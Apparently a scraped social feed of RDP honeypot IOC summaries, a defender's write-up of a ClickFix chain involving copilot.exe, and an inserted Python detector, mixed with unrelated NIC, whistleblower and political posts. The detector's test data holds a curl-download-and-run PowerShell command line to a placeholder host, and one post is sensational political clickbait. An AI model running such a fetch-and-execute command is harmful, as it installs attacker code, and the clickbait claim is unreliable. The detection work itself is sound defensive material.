
2025-04-27 RDP #Honeypot IOCs - 10322 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec

Top IPs:
161.97.77.37 - 8850
159.89.6.147 - 1300
80.94.95.198 - 40

Top ASNs:
AS51167 - 8850
AS14061 - 1344
AS204428 - 42

Top Accounts:
hello - 10202
142.93.8.59 - 74
Test - 12

Top ISPs:
Contabo GmbH - 8850
DigitalOcean, LLC - 1344
SS-Net - 42

Top Clients:
Unknown - 10322

Top Software:
Unknown - 10322

Top Keyboards:
Unknown - 10322

Top IP Classification:
hosting - 10188
Unknown - 102
hosting & proxy - 32

Pastebin links with full 24-hr RDP Honeypot IOC Lists:
pastebin.com/pSETBRE9


Examine your EDR telemetry or other process command logs for the following #clickfix flow:

Explorer.exe -> powershell.exe -> cmd.exe -> curl/wget to grab a .ps1 -> powershell.exe

The above flow was initiated using a Cloudflare Captcha challenge on a compromised website which fooled the victim into running the clipboard command. Also, look out for internet traffic which sources from copilot.exe. It won’t have a referrer in proxy logging, which made figuring out where or how the victim initially hit the clickfix domain difficult. EDR telemetry ultimately showed copilot.exe making the initial netconn to the clickfix domain. Microsoft Purview analysis of Copilot was needed to figure out what the victim entered in the prompt to drive them to the compromised site hosting the clickfix payload.

Mitigation is to recommend restricting cmd.exe or powershell.exe execution to privileged groups only. Bob in the C-suite shouldn’t be able to use run to execute cmd.exe commands copied to his clipboard. Scope usage of cmd/powershell so you don’t blow up legitimate patching or remote assistance efforts. Also, know if copilot is on in your org and restrict or create privileged groups who need it.

Almost every threat actor I track now is using the clickfix technique, apparently because it works. Users are more than happy to self-diagnose problems or solve bogus captchas by doing what prompts tell them to do.
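The process chain and the copilot.exe pivot from the post above, as an added example that is not part of the original post: a small detector over constructed EDR-style process-start and network-connection events. The event field layout, hostnames, timestamps and the 10-minute correlation window are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed EDR-style process-start events: (pid, ppid, image, command line, start time).
PROCS = [
    (100, 1,   "explorer.exe",   "explorer.exe",                               "12:00:00"),
    (200, 100, "powershell.exe", "powershell -w hidden -c <pasted clipboard>", "12:04:10"),
    (300, 200, "cmd.exe",        "cmd /c curl -o s.ps1 http://example.invalid/s.ps1 && powershell -f s.ps1", "12:04:11"),
    (400, 300, "curl.exe",       "curl -o s.ps1 http://example.invalid/s.ps1", "12:04:11"),
    (500, 300, "powershell.exe", "powershell -f s.ps1",                        "12:04:13"),
    (600, 100, "powershell.exe", "powershell",                                 "12:30:00"),  # benign admin console
]
# Constructed network-connection events: (image, destination host, time).
NETCONNS = [
    ("msedge.exe",  "update.example.invalid",      "11:50:00"),
    ("copilot.exe", "compromised.example.invalid", "12:03:40"),
]
DOWNLOADERS = {"curl.exe", "wget.exe"}
PS1 = re.compile(r"\.ps1\b", re.IGNORECASE)

def _t(hms):
    return datetime.strptime(hms, "%H:%M:%S")

def find_clickfix_chains(procs=PROCS):
    """PIDs of the final powershell.exe in each explorer -> powershell -> cmd -> curl/wget(.ps1) -> powershell chain."""
    by_pid = {p[0]: p for p in procs}
    kids = {}
    for p in procs:
        kids.setdefault(p[1], []).append(p)
    hits = []
    for p in procs:
        cmd = by_pid.get(p[1])                      # parent must be cmd.exe
        ps0 = by_pid.get(cmd[1]) if cmd else None   # grandparent: the first powershell.exe
        exp = by_pid.get(ps0[1]) if ps0 else None   # great-grandparent: explorer.exe
        chain = [x[2].lower() if x else None for x in (p, cmd, ps0, exp)]
        if chain != ["powershell.exe", "cmd.exe", "powershell.exe", "explorer.exe"]:
            continue
        # cmd.exe must also have spawned curl/wget whose command line names a .ps1
        if any(k[2].lower() in DOWNLOADERS and PS1.search(k[3]) for k in kids.get(cmd[0], [])):
            hits.append(p[0])
    return hits

def copilot_pivots(chain_pid, procs=PROCS, netconns=NETCONNS, window_min=10):
    """copilot.exe connections made up to window_min minutes before the chain's first
    powershell.exe started: the referrer-less initial netconn the post describes."""
    by_pid = {p[0]: p for p in procs}
    first_ps = by_pid[by_pid[by_pid[chain_pid][1]][1]]   # powershell <- cmd <- powershell
    start = _t(first_ps[4])
    return [n for n in netconns if n[0].lower() == "copilot.exe"
            and start - timedelta(minutes=window_min) <= _t(n[2]) <= start]
```

The benign console chain (explorer -> powershell -> cmd without a downloader child) is deliberately not flagged, which is the scoping the mitigation paragraph asks for.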

2025-04-24 RDP #Honeypot IOCs - 6872 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec

Top IPs:
191.96.106.18 - 3132
212.56.53.170 - 1635
152.230.66.217 - 992

Top ASNs:
AS174 - 3132
Unknown - 1671
AS14259 - 992

Top Accounts:
hello - 6650
142.93.8.59 - 114
Test - 36

Top ISPs:
Cogent Communications - 3132
VPN Consumer Ashburn - 1635
Gtd Internet S.A. - 992

Top Clients:
Unknown - 6872

Top Software:
Unknown - 6872

Top Keyboards:
Unknown - 6872

Top IP Classification:
proxy - 3132
Unknown - 2804
hosting - 921

Pastebin links with full 24-hr RDP Honeypot IOC Lists:
pastebin.com/q3xUP7AD


@k4m1 @stman yeah, according to the #RTL8139 #datasheet this is basically a very cheap 10/100M NIC designed for #embedded systems and low-end/low-cost desktops, and for a device designed and sold in 2006 it made sense, given back then #Gigabit-#Ethernet and Cat.5 cabling were considered high-end.

  • And unlike contemporary / successor chips by #Intel like the famous #i210 (which is still offered as #i219 but mostly succeeded by the #i225 as a 2,5GBase-T version) it is way cheaper, with pre-#RoHS NICs being sold for like € 10 retail & brand-new....

The few issues known only affect like #Virtualization setups, a market this thing was never designed for (most likely also never tested against).

  • I'd not be surprised if a lot of cheap #ThinClients and other systems used these NICs because of the simplicity of integration, being a cheap 3,3V single-chip (+auxiliary electronics) solution and probably costing less than 10¢ on a reel of 10.000.

It's the reason why to this day we see #Realtek NICs being shipped instead of fanning-out & enabling #SoC-integrated NICs with a #MAC & #PHY instead: Because the auxiliary parts for those are more expensive than just getting a PCI(e lane) somewhere and plonking it down.

  • Maybe there have even been some really cheap, low-end #Routers / #Firewalls aiming at #SoHo customers back in those days, cuz back then 16MBit/s #ADSL2 was considered fast, and Realtek's NICs up until recently only delivered like 60-75% of the max. speed advertised, so by the time someone would notice, that gear would've been EoL'd anyway and those who did notice right-away never were the target audience to begin with.

Most modern NICs are more complex and demand more configuration / driver support...

This NLRB whistleblower complaint is a horror story for any CERT team. As a CTI/SOC analyst, if I see spawned powershell invoking web requests to some random-ass AI API reverse-engineering tool/headless browser repository, large outbound byte transfers measured in GBs, or conditional access policies/MFA being tampered with, you’re getting isolated and we’re standing up an incident response bridge. Also, someone on your team has an info stealer on their device if they’re seeing attempted logins from a foreign country within fifteen minutes of account creation.

This is an insider threat case of the worst kind: one your security team gets to watch but can’t do a damn thing to stop.

arstechnica.com/tech-policy/20

whistlebloweraid.org/wp-conten

🚨 Shocking! According to a recent article, Trump would want to deport American citizens abroad. 🤯 You read that right! The article claims that "the homegrown ones are next" and that Trump hopes to imprison American citizens in foreign countries. How is that even possible? 🤔 Find out more details about this explosive information in the article!

#Trump #Deportare #PoliticaAmericana #Soc #CetateniAmericani #Incarcerare

Read more: newsro.us/politics/trump-vrea-

2025-04-15 RDP #Honeypot IOCs - 8100 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec

Top IPs:
156.146.57.47 - 5064
156.146.57.181 - 2304
222.100.239.9 - 450

Top ASNs:
AS212238 - 7368
AS4766 - 483
AS48721 - 63

Top Accounts:
hello - 7836
142.93.8.59 - 177
Administr - 27

Top ISPs:
Datacamp Limited - 7368
Korea Telecom - 483
Flyservers S.A. - 63

Top Clients:
Unknown - 8100

Top Software:
Unknown - 8100

Top Keyboards:
Unknown - 8100

Top IP Classification:
hosting & proxy - 7371
Unknown - 657
hosting - 54

Pastebin links with full 24-hr RDP Honeypot IOC Lists:
pastebin.com/ZsnpxT0s
